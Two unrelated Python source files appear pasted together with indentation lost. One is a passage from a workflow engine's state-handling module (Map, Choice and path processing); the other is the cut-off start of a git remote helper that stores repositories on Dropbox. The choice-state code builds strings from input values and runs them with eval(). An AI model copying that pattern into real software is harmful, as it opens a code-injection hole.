if "__state_action" not in metadata or metadata["__state_action"] != "post_map_processing":
# here we start the iteration process on a first batch
if maxConcurrency != 0:
tobeProcessednow = function_input[:maxConcurrency] # take the first maxConcurrency elements
tobeProcessedlater = function_input[maxConcurrency:] # keep the remaining elements for later
else:
tobeProcessednow = function_input
tobeProcessedlater = []
self._logger.debug("[StateUtils] Map state function_input split:" + str(tobeProcessednow) + " " + str(tobeProcessedlater))
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater)) # store elements to be processed on DL
sapi.put(name_prefix + "_" + "mapStatePartialResult", "[]") # initialise the collector variable
sapi.put(name_prefix + "_" + "mapInputCount", str(len(function_input)))
function_output, metadata = self.evaluateMapState(tobeProcessednow, key, metadata, sapi)
elif metadata["__state_action"] == "post_map_processing":
tobeProcessedlater = ast.literal_eval(sapi.get(name_prefix + "_" + "tobeProcessedlater")) # get all elements that have not yet been processed
self._logger.debug("[StateUtils] Map state post_map processing input:" + str(tobeProcessedlater))
# we need to decide at this point if there is a need for more batches. if so:
if len(tobeProcessedlater) > 0: # we need to start another batch
function_output, metadata2 = self.evaluatePostMap(function_input, key, metadata, sapi) # take care not to overwrite metadata
function_output, metadata = self.evaluateMapState(tobeProcessedlater[:maxConcurrency], key, metadata, sapi) # start a new batch
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater[maxConcurrency:])) # store remaining elements to be processed on DL
else:# no more batches required. we are at the iteration end, publish the final result
self._logger.debug("[StateUtils] Map state input final stage: " + str(function_input))
function_output, metadata = self.evaluatePostMap(function_input, key, metadata, sapi)
else:
raise Exception("Unknow action type in map state")
else:
raise Exception("Unknown state type")
return function_output, metadata
def applyResultPath(self, raw_state_input, function_output):
#4. Apply ResultPath, if available and if not 'Parallel' state
# if ResultPath:
# if ResultPath == '$' (this is the default value)
# raw_state_input_midway = function_output
# if ResultPath == 'null'
# raw_state_input_midway = raw_state_input
# if ResultPath == some variable name
# raw_state_input[some variable name] = function_output
# raw_state_input_midway = raw_state_input
# else:
# raw_state_input_midway = function_output
#
raw_state_input_midway = raw_state_input
#self._logger.debug("Reached applyResultPath: " + str(self.result_path_dict))
try:
if self.result_path_dict and 'ResultPath' in self.result_path_dict:
raw_state_input_midway = self.process_result_path(self.result_path_dict, raw_state_input, function_output)
else:
raw_state_input_midway = function_output
return raw_state_input_midway
except Exception as exc:
raise Exception("Result path processing exception: " + str(exc))
#self._logger.exception("Result path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def applyOutputPath(self, raw_state_input_midway):
#5. Apply OutputPath, if available
# if OutputPath:
# if OutputPath == '$' (this is the default value)
# raw_state_output = raw_state_input_midway
# if OutputPath = 'null'
# raw_state_output = {}
# if OutputPath == some existing variable in 'raw_state_input_midway'
# raw_state_output = raw_state_input_midway[some existing variable]
# if OutputPath == some non-existing variable
# throw exception
# else:
# raw_state_output = raw_state_input_midway
raw_state_output = raw_state_input_midway
try:
if self.output_path_dict and 'OutputPath' in self.output_path_dict:
raw_state_output = self.process_output_path(self.output_path_dict, raw_state_input_midway)
else:
raw_state_output = raw_state_input_midway
return raw_state_output
except Exception as exc:
raise Exception("Output path processing exception: " + str(exc))
#self._logger.exception("Output path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def parse_function_state_info(self):
if self.functionstatetype == StateUtils.defaultStateType:
#self._logger.debug("Task_SAND state parsing. Not parsing further")
return
else:
self.parsedfunctionstateinfo = json.loads(self.functionstateinfo)
statedef = self.parsedfunctionstateinfo
statetype = self.functionstatetype
assert statetype == statedef['Type']
if statetype == StateUtils.waitStateType:
self._logger.debug("Wait state parsing")
if statetype == StateUtils.failStateType:
self._logger.debug("Fail state parsing")
if statetype == StateUtils.succeedStateType:
self._logger.debug("Succeed state parsing")
if statetype == StateUtils.taskStateType:
#self._logger.debug("Task state parsing")
if "InputPath" in statedef: # read the I/O Path dicts
self.input_path_dict['InputPath'] = statedef['InputPath']
#self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
#self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if "Catch" in statedef:
self.catcher_list = statedef['Catch']
# parse it once and store it
self.catcher_list = ast.literal_eval(str(self.catcher_list))
#self._logger.debug("found Catchers: " + str(self.catcher_list))
if "Retry" in statedef:
self.retry_list = statedef['Retry']
# parse it once and store it
self.retry_list = ast.literal_eval(str(self.retry_list))
#self._logger.debug("found Retry: " + str(self.retry_list))
if statetype == StateUtils.choiceStateType:
#self._logger.debug("Choice state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(statedef['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(statedef['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
self._logger.debug("Choice state rules: " + json.dumps(statedef))
if "Default" in statedef:
self.default_next_choice.append(statedef["Default"])
self._logger.debug("DefaultTarget: " + str(self.default_next_choice))
choices_list = statedef['Choices'] # get the choice rule list for this state
self._logger.debug("Choice state rules list: " + str(choices_list))
key_dict = {} # parse the choice rule list into an expression tree
for choices in choices_list:
self._logger.debug("Choice state rule element processed: " + json.dumps(list(choices.keys())))
#self._logger.debug("converted_function_output: " + str(converted_function_output))
operator_counter = 0
if ("Not" in list(choices.keys())) or ("And" in list(choices.keys())) or ("Or" in list(choices.keys())):
operator_counter += 1
if operator_counter == 0: # No operators, so no recursive evaluation required
self.traverse(choices['Next'], choices)
hostname = self.nodelist[-1].split("/")[0]
childname = self.nodelist[-1].split("/")[1]
previousnode = anytree.Node(choices['Next'])
root = previousnode
key_dict[hostname] = previousnode
previousnode = anytree.Node(childname, parent=previousnode) # key_dict[hostname])
#evalname = ast.literal_eval(str(previousnode.name))
else: # operator detected, we need to traverse the choice rule tree
self.traverse(choices['Next'], choices)
nodename = self.nodelist[-1].split("/")[0]
previousnode = anytree.Node(nodename)
root = previousnode
key_dict[self.nodelist[-1].split("/{")[0]] = previousnode
no_childs = 1 # we already have attached the root
for i in range(len(self.nodelist)): # count the nodes in the choice rule tree which do not have childs
children = self.nodelist[-(i+1)].split("/")[-1]
if children.strip("") == "{}":
no_childs += 1
for i in range(no_childs):
nodename = self.nodelist[-(i+2)].split("/")[i+1]
previousnode = anytree.Node(nodename, parent=previousnode)
key_dict[self.nodelist[-(i+2)].split("/{")[0]] = previousnode
# from now on we have to attach the children expressions
for i in range(len(self.nodelist)-no_childs):
childname = self.nodelist[-(i+no_childs+1)].split("/")[-1]
hostname = self.nodelist[-(i+no_childs+1)].split("/{")[0]
previousnode = anytree.Node(childname, key_dict[hostname])
#self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(root)))
self.parsed_trees.append(root)
if statetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.parallelStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.mapStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "ItemsPath" in statedef:
self.items_path_dict['ItemsPath'] = statedef['ItemsPath']
self._logger.debug("found ItemsPath: " + json.dumps(self.items_path_dict['ItemsPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
def EvaluateNode(self, node):
"""
Recursively parse the expression tree starting from given node into a python statement
"""
if not node.children: # this is a leaf node
evalname = json.dumps(ast.literal_eval(str(node.name)))
#type(evalname) == int or type(evalname) == float:
ev_expr = "(" + self.evaluate(evalname) + ")"
return ev_expr
else: #node is an operator
if node.name == "Not": # there can be only one child
child = node.children[0]
evalname = json.dumps(ast.literal_eval(str(child.name)))
ev_expr = self.evaluate(evalname)
return "not (%s)" % ev_expr
if node.name == "And": # collect all children recursively
child_and_array = []
for child in node.children:
child_and_array.append(self.EvaluateNode(child))
returnstr = "(" + " and ".join(child_and_array) + ")"
return returnstr
if node.name == "Or": # collect all children recursively
child_or_array = []
for child in node.children:
child_or_array.append(self.EvaluateNode(child))
returnstr = "(" + " or ".join(child_or_array) + ")"
return returnstr
else: #unknown operator found here. Thow some error!
raise Exception("Parse Error: unknown operator found: ", node.name)
def evaluate(self, expression):
"""
evaluate a AWS Choice rule expression with the data contained in values
"""
expr = []
ex = json.loads(expression)
self._logger.debug(expression)
vals = {}
if "Variable" in ex.keys():
k = ex["Variable"].split("$.")[1]
vals[k] = ""
expr.append(k)
for op in self.operators:
if op in ex.keys():
expr.append(self.operators_python[self.operators.index(op)])
expr.append(ex[op])
break
if isinstance(expr[2], (int, float)):
result = "%s %s %s" % (expr[0], expr[1], expr[2])
else:
result = "%s %s '%s'" % (expr[0], expr[1], expr[2]) # we want to compare strings with strings
return result
def process_parameters(self, parameters, state_data):
"""
evaluate JSON path Paramaters in conjunction with state_data
"""
parameters = parameters['Parameters']
ret_value = None
ret_item_value = None
if parameters == "$": # return unfiltered input data
ret_value = state_data
elif parameters is None: #return empty json
ret_value = {}
else: # contains a parameter filter, get it and return selected kv pairs
ret_value = {}
ret_index = {}
for key in parameters.keys(): # process parameters keys
if key.casefold() == "comment".casefold(): # ignore
ret_value[key] = parameters[key]
elif parameters[key] == "$$.Map.Item.Value": # get Items key
value_key = key.split(".$")[0]
ret_value = value_key
ret_item_value = value_key
elif parameters[key] == "$$.Map.Item.Index": # get Index key
index_key = key.split(".$")[0]
ret_index = index_key
else: # processing more complex Parameters values
if isinstance(parameters[key], dict): # parameters key refers to dict value
ret_value[key] = {}
for k in parameters[key]: # get nested keys
if not k.split(".")[-1] == "$": # parse static value
print (parameters[key][k])
ret_value[key][k] = parameters[key][k]
else:
new_key = k.split(".$")[0] # use the json paths in paramters to match
ret_value[key][new_key] = [match.value for match in parse(parameters[key][k]).find(state_data)][0]
return ret_value
if isinstance(parameters[key], str): # parameters key refers to string value
ret_value = {}
new_key = key.split(".$")[0] # get the parameters key
query_key = parameters[key].split("$.")[1] # correct the correspondig value
new_value = state_data[query_key] # save the actual value before replacing the key
for kk in state_data.keys():
if isinstance(state_data[kk], dict): # value encapsulates dict
ret_value[new_key] = new_value
if ret_item_value != None:
ret_value[ret_item_value] = state_data[kk]
else:
raise Exception("Error: item value is not set!")
ret_value_dict = {}
ret_value_dict[kk] = ret_value
return ret_value_dict
if isinstance(state_data[kk], list): # value encapsulates list
ret_value_list = []
for data in state_data[kk]:
ret_value_list.append({new_key: new_value, ret_item_value: data})
ret_value_dict = {}
ret_value_dict[kk] = ret_value_list
return ret_value_dict
else:
raise Exception("Error: invaldid Parmeters format: " + str(parameters[key]))
# calculate transformed state output provided to Iterator
ret_total = []
ret_total_dict = {}
if isinstance(state_data, dict):
for kk in state_data.keys():
for key in state_data[kk]:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data[kk].index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data[kk].index(key) })
else:
raise Exception("Map State Parameters parse error on dict input: " + str(state_data))
ret_total_dict[kk] = ret_total
ret_value = ret_total_dict
elif isinstance(state_data, list):
for key in state_data:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data.index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data.index(key) })
else:
raise Exception("Map State Parameters parse error on list input: " + str(list))
ret_value = ret_total
else:
raise Exception("Map state parse error: invalid state input")
return ret_value
def process_items_path(self, path_fields, state_data):
ret_value = None
if 'ItemsPath' not in list(path_fields.keys()):
path_fields['ItemsPath'] = "$"
input_path = path_fields['ItemsPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty list
ret_value = []
else: # it contains a filter, get it and return selected list in input
self._logger.debug("seeing items_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
if not filtered_state_data:
raise Exception("Items Path processing exception: no match with map state item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def process_input_path(self, path_fields, state_data):
ret_value = None
if 'InputPath' not in list(path_fields.keys()):
path_fields['InputPath'] = "$"
#return state_data
input_path = path_fields['InputPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty dict
ret_value = {}
else: # input_path contains a filter, get and apply it
self._logger.debug("seeing input_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
self._logger.debug("after seeing input_path filter: " + str(filtered_state_data))
if not filtered_state_data:
raise Exception("Input Path processing exception: no match with state input item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def nested_dict(self, keys, value):
if len(keys) == 1:
return {keys[0]: value}
return {keys[0]: self.nested_dict(keys[1:], value)}
def process_result_path(self, path_fields, state_data, task_output):
ret_value = None
# path_fields: result path dict
# state_data: input dict
# task_output: output of the state/task
if 'ResultPath' not in list(path_fields.keys()):
path_fields['ResultPath'] = "$"
result_path = path_fields['ResultPath']
if result_path == "$":
ret_value = state_data
elif result_path is None:
ret_value = {}
else: # result_path is not empty so is there a match?
self._logger.debug("inside ResultPath processing: " + str(result_path) + " " + str(task_output) )
keys = list(tokenize(result_path)) # get all keys
filtered_state_data = self.nested_dict(keys[1:], task_output)
if isinstance(state_data, dict):
ret_value = dict(list(filtered_state_data.items()) + list(state_data.items())) # adding key and values to new dict
else:
ret_value = filtered_state_data
return ret_value
def process_output_path(self, path_fields, raw_state_input_midway):
ret_value = None
if 'OutputPath' not in list(path_fields.keys()):
path_fields['OutputPath'] = "$"
output_path = path_fields['OutputPath']
if output_path == "$":
ret_value = raw_state_input_midway
elif output_path is None:
ret_value = {}
else: # output_path is not empty so is there a match?
filtered_state_data = [match.value for match in parse(output_path).find(raw_state_input_midway)]
if not filtered_state_data:
raise Exception("Exception: no match with state input item, invalid path!")
else:
key = str(parse(output_path).nodes[-1].value[0])
filtered_state_data = raw_state_input_midway[key]
ret_value = filtered_state_data
return ret_value
def traverse(self, path, obj):
"""
Traverse the object recursively and print every path / value pairs.
"""
cnt = -1
if isinstance(obj, dict):
d = obj
d_sum = {}
for k, v in list(d.items()):
if isinstance(v, dict):
self.traverse(path + "/" + k, v)
elif isinstance(v, list):
self.traverse(path + "/" + k, v)
else:
d_sum[k] = v
self.nodelist.append(path + "/" + str(d_sum))
if isinstance(obj, list):
li = obj
for e in li:
cnt += 1
if isinstance(e, dict):
self.traverse("{path}".format(path=path), e)
elif isinstance(e, list):
self.traverse("{path}".format(path=path), e)
def evaluateNextState(self, function_input):
# this should be called for Choice state only
# for the rest the next values are statically defined and are parsed by hostagent
if len(self.default_next_choice) > 0:
nextfunc = self.default_next_choice[-1]
self._logger.debug("[StateUtils] choice_function_input: " + str(function_input))
for tree in self.parsed_trees:
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(tree.root)))
##self._logger.debug("Resulting Rendered Tree Root: " + str(tree.root))
test = self.EvaluateNode(tree.children[0])
self._logger.debug("[StateUtils] choice test: " + str(test))
self._logger.debug("Resulting Parsed Expression: " + str(test))
self._logger.debug("Current Value String: " + json.dumps(function_input))
# Sample value input to choice {"Comment": "Test my Iterator function", "iterator": {"count": 10, "index": 5, "step": 1}}
for key in list(function_input.keys()):
new_test = "False"
key = str(key)
if key == "Comment":
continue
#if "iterator.continue" == str(key):
self._logger.debug("[StateUtils] choice value key under test: " + key)
#keys = "continue"
if key in str(test):
val = function_input[key]
self._logger.debug("[StateUtils] choice val: " + str(val))
if isinstance(val, (int, float)): # calculate new_test value, no additional processing of values
self._logger.debug("[StateUtils] choice key/val: " + key + "/" + str(val))
new_test = test.replace(key, str(val))
self._logger.debug("[StateUtils] choice eval new_test: " + str(eval(str(new_test))))
elif "." in test: # need to process the json path of this variable name
test2 = "$." + test.lstrip('(').rstrip(')').split("==")[0] # rebuild the json path for the variable
jsonpath_expr = parse(test2)
choice_state_path_data = [match.value for match in jsonpath_expr.find(function_input)]
new_test = str(choice_state_path_data[0])
else:
new_test = test.replace(key, "'" + str(val)+"'") # need to add high colons to key to mark as string inside the expression
if eval(str(new_test)):
nextfunc = tree.root.name.strip("/")
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc # {"next":nextfunc, "value": post_processed_value}
# if no choice rule applied, return the last one (assigned at the beginning)
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc
|
__init__.py
|
#!/usr/bin/env python
# Copyright (c) 2015-2017 Anish Athalye (me@anishathalye.com)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import dropbox
import json
import multiprocessing
import multiprocessing.dummy
import multiprocessing.pool
import os
import posixpath
import subprocess
import sys
import zlib
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
__version__ = '1.0.3'
CONFIG_FILE = '~/.git-remote-dropbox.json'
DEVNULL = open(os.devnull, 'w')
PROCESSES = 20
MAX_RETRIES = 3
def stdout(line):
"""
Write line to standard output.
"""
sys.stdout.write(line)
sys.stdout.flush()
def stderr(line):
"""
Write line to standard error.
"""
sys.stderr.write(line)
sys.stderr.flush()
def readline():
"""
Read a line from standard input.
"""
return sys.stdin.readline().strip() # remove trailing newline
def stdout_to_binary():
"""
Ensure that stdout is in binary mode on windows
"""
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
def git_command_output(*args, **kwargs):
"""
Return the result of running a git command.
"""
args = ('git',) + args
output = subprocess.check_output(args, stderr=DEVNULL)
if kwargs.get('decode', True):
output = output.decode('utf8')
if kwargs.get('strip', True):
output = output.strip()
return output
def git_command_ok(*args):
"""
Return whether a git command runs successfully.
"""
args = ('git',) + args
return subprocess.call(args, stdout=DEVNULL, stderr=DEVNULL) == 0
def git_is_ancestor(ancestor, ref):
"""
Return whether ancestor is an ancestor of ref.
This returns true when it is possible to fast-forward from ancestor to ref.
"""
return git_command_ok('merge-base', '--is-ancestor', ancestor, ref)
def git_object_exists(sha):
"""
Return whether the object exists in the repository.
"""
return git_command_ok('cat-file', '-t', sha)
def git_history_exists(sha):
"""
Return whether the object, along with its history, exists in the
repository.
"""
return git_command_ok('rev-list', '--objects', sha)
def git_ref_value(ref):
"""
Return the hash of the ref.
"""
return git_command_output('rev-parse', ref)
def git_object_kind(sha):
"""
Return the type of the object.
"""
return git_command_output('cat-file', '-t', sha)
def git_object_data(sha, kind=None):
"""
Return the contents of the object.
If kind is None, return a pretty-printed representation of the object.
"""
if kind is not None:
return git_command_output('cat-file', kind, sha, decode=False, strip=False)
else:
return git_command_output('cat-file', '-p', sha, decode=False, strip=False)
def git_encode_object(sha):
"""
Return the encoded contents of the object.
The encoding is identical to the encoding git uses for loose objects.
This operation is the inverse of `git_decode_object`.
"""
kind = git_object_kind(sha)
size = git_command_output('cat-file', '-s', sha)
contents = git_object_data(sha, kind)
data = kind.encode('utf8') + b' ' + size.encode('utf8') + b'\0' + contents
compressed = zlib.compress(data)
return compressed
def git_decode_object(data):
"""
Decode the object, write it, and return the computed hash.
This operation is the inverse of `git_encode_object`.
"""
decompressed = zlib.decompress(data)
header, contents = decompressed.split(b'\0', 1)
kind = header.split()[0]
p = subprocess.Popen(['git', 'hash-object', '-w', '--stdin', '-t', kind.decode('utf8')],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=DEVNULL)
sha = p.communicate(contents)[0].decode('utf8').strip()
return sha
def git_list_objects(ref, exclude):
"""
Return the objects reachable from ref excluding the objects reachable from
exclude.
"""
exclude = ['^%s' % obj for obj in exclude if git_object_exists(obj)]
objects = git_command_output('rev-list', '--objects', ref, *exclude)
if not objects:
return []
return [i.split()[0] for i in objects.split('\n')]
def git_referenced_objects(sha):
"""
Return the objects directly referenced by the object.
"""
kind = git_object_kind(sha)
if kind == 'blob':
# blob objects do not reference any other objects
return []
data = git_object_data(sha).decode('utf8').strip()
if kind == 'tag':
# tag objects reference a single object
obj = data.split('\n')[0].split()[1]
return [obj]
elif kind == 'commit':
# commit objects reference a tree and zero or more parents
lines = data.split('\n')
tree = lines[0].split()[1]
objs = [tree]
for line in lines[1:]:
if line.startswith('parent '):
objs.append(line.split()[1])
else:
break
return objs
elif kind == 'tree':
# tree objects reference zero or more trees and blobs, or submodules
lines = data.split('\n')
# submodules have the mode '160000' and the kind 'commit', we filter them out because
# there is nothing to download and this causes errors
return [line.split()[2] for line in lines if not line.startswith('160000 commit ')]
else:
raise Exception('unexpected git object type: %s' % kind)
class Level(object):
"""
A class for severity levels.
"""
ERROR = 0
INFO = 1
DEBUG = 2
class Poison(object):
"""
A poison pill.
Instances of this class can be used as sentinel objects to communicate
termination requests to processes.
"""
def __init__(self, message=None):
self.message = message
class Binder(object):
"""
A class to bind a method to an object.
Python's built-in pickling does not work on bound methods or lambdas. This
class is designed to work around that restriction. In addition, it provides
the ability to partially apply a function.
For example, Binder can be used as follows:
>>> class A(object):
... def __init__(self, x):
... self.x = x
... def add(self, y, z):
... return self.x + y + z
...
>>> b = Binder(A(1), 'add', 2)
>>> b(3)
6
In the above example, it is possible to pickle the `b` object.
"""
def __init__(self, obj, func_name, *args):
"""
Initialize a Binder with an object and a function by its name.
Partially apply the function with args.
"""
self._obj = obj
self._func_name = func_name
self._args = args
def __call__(self, *args):
"""
Call the function bound to the object, passing args if given.
"""
# we cannot pickle an instance method, but we can pickle the instance
# itself along with the method name, and then we can dynamically
# retrieve the unbound method and call it with the instance and
# arguments
method = getattr(type(self._obj), self._func_name)
args = self._args + args
return method(self._obj, *args)
class Helper(object):
"""
A git remote helper to communicate with Dropbox.
"""
def __init__(self, token, path, processes=PROCESSES):
self._token = token
self._path = path
self._processes = processes
self._verbosity = Level.INFO # default verbosity
self._refs = {} # map from remote ref name => (rev number, sha)
self._pushed = {} # map from remote ref name => sha
@property
def verbosity(self):
return self._verbosity
def _write(self, message=None):
"""
Write a message to standard output.
"""
if message is not None:
stdout('%s\n' % message)
else:
stdout('\n')
def _trace(self, message, level=Level.DEBUG, exact=False):
"""
Log a message with a given severity level.
"""
if level > self._verbosity:
return
if exact:
if level == self._verbosity:
stderr(message)
return
if level <= Level.ERROR:
stderr('error: %s\n' % message)
elif level == Level.INFO:
stderr('info: %s\n' % message)
elif level >= Level.DEBUG:
stderr('debug: %s\n' % message)
def _fatal(self, message):
"""
Log a fatal error and exit.
"""
self._trace(message, Level.ERROR)
exit(1)
def _connection(self):
"""
Return a Dropbox connection object.
"""
# we use fresh connection objects for every use so that multiple
# threads can have connections simultaneously
return dropbox.Dropbox(self._token)
def run(self):
"""
Run the helper following the git remote helper communication protocol.
"""
while True:
line = readline()
if line == 'capabilities':
self._write('option')
self._write('push')
self._write('fetch')
self._write()
elif line.startswith('option'):
self._do_option(line)
elif line.startswith('list'):
self._do_list(line)
elif line.startswith('push'):
self._do_push(line)
elif line.startswith('fetch'):
self._do_fetch(line)
elif line == '':
break
else:
self._fatal('unsupported operation: %s' % line)
def _do_option(self, line):
"""
Handle the option command.
"""
if line.startswith('option verbosity'):
self._verbosity = int(line[len('option verbosity '):])
self._write('ok')
else:
self._write('unsupported')
def _do_list(self, line):
"""
Handle the list command.
"""
for_push = 'for-push' in line
refs = self._get_refs(for_push=for_push)
for ref in refs:
self._write(ref)
self._write()
def _do_push(self, line):
"""
Handle the push command.
"""
while True:
src, dst = line.split(' ')[1].split(':')
if src == '':
self._delete(dst)
else:
self._push(src, dst)
line = readline()
if line == '':
break
self._write()
def _do_fetch(self, line):
"""
Handle the fetch command.
"""
while True:
_, sha, value = line.split(' ')
self._fetch(sha)
line = readline()
if line == '':
break
self._write()
def _delete(self, ref):
"""
Delete the ref from the remote.
"""
self._trace('deleting ref %s' % ref)
try:
self._connection().files_delete(self._ref_path(ref))
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.DeleteError):
raise
# someone else might have deleted it first, that's fine
self._refs.pop(ref, None) # discard
self._pushed.pop(ref, None) # discard
self._write('ok %s' % ref)
def _push(self, src, dst):
"""
Push src to dst on the remote.
"""
force = False
if src.startswith('+'):
src = src[1:]
force = True
present = [self._refs[name][1] for name in self._refs]
present.extend(self._pushed.values())
# before updating the ref, write all objects that are referenced
objects = git_list_objects(src, present)
try:
# upload objects in parallel
pool = multiprocessing.pool.ThreadPool(processes=self._processes)
res = pool.imap_unordered(Binder(self, '_put_object'), objects)
# show progress
total = len(objects)
self._trace('', level=Level.INFO, exact=True)
for done, _ in enumerate(res, 1):
pct = float(done) / total
message = '\rWriting objects: {:4.0%} ({}/{})'.format(pct, done, total)
if done == total:
message = '%s, done.\n' % message
self._trace(message, level=Level.INFO, exact=True)
except Exception:
if self.verbosity >= Level.DEBUG:
raise # re-raise exception so it prints out a stack trace
else:
self._fatal('exception while writing objects (run with -v for details)\n')
sha = git_ref_value(src)
error = self._write_ref(sha, dst, force)
if error is None:
self._write('ok %s' % dst)
self._pushed[dst] = sha
else:
self._write('error %s %s' % (dst, error))
def _ref_path(self, name):
"""
Return the path to the given ref on the remote.
"""
assert name.startswith('refs/')
return posixpath.join(self._path, name)
def _ref_name_from_path(self, path):
"""
Return the ref name given the full path of the remote ref.
"""
prefix = '%s/' % self._path
assert path.startswith(prefix)
return path[len(prefix):]
def _object_path(self, name):
"""
Return the path to the given object on the remote.
"""
prefix = name[:2]
suffix = name[2:]
return posixpath.join(self._path, 'objects', prefix, suffix)
def _get_file(self, path):
"""
Return the revision number and content of a given file on the remote.
Return a tuple (revision, content).
"""
self._trace('fetching: %s' % path)
meta, resp = self._connection().files_download(path)
return (meta.rev, resp.content)
def _put_object(self, sha):
"""
Upload an object to the remote.
"""
data = git_encode_object(sha)
path = self._object_path(sha)
self._trace('writing: %s' % path)
retries = 0
while True:
try:
mode = dropbox.files.WriteMode('overwrite')
self._connection().files_upload(data, path, mode, mute=True)
except dropbox.exceptions.InternalServerError:
self._trace('internal server error writing %s, retrying' % sha)
if retries < MAX_RETRIES:
retries += 1
else:
raise
else:
break
def _download(self, input_queue, output_queue):
"""
Download files given in input_queue and push results to output_queue.
"""
while True:
try:
obj = input_queue.get()
if isinstance(obj, Poison):
return
_, data = self._get_file(self._object_path(obj))
computed_sha = git_decode_object(data)
if computed_sha != obj:
output_queue.put(
Poison('hash mismatch %s != %s' % (computed_sha, obj)))
output_queue.put(obj)
except Exception as e:
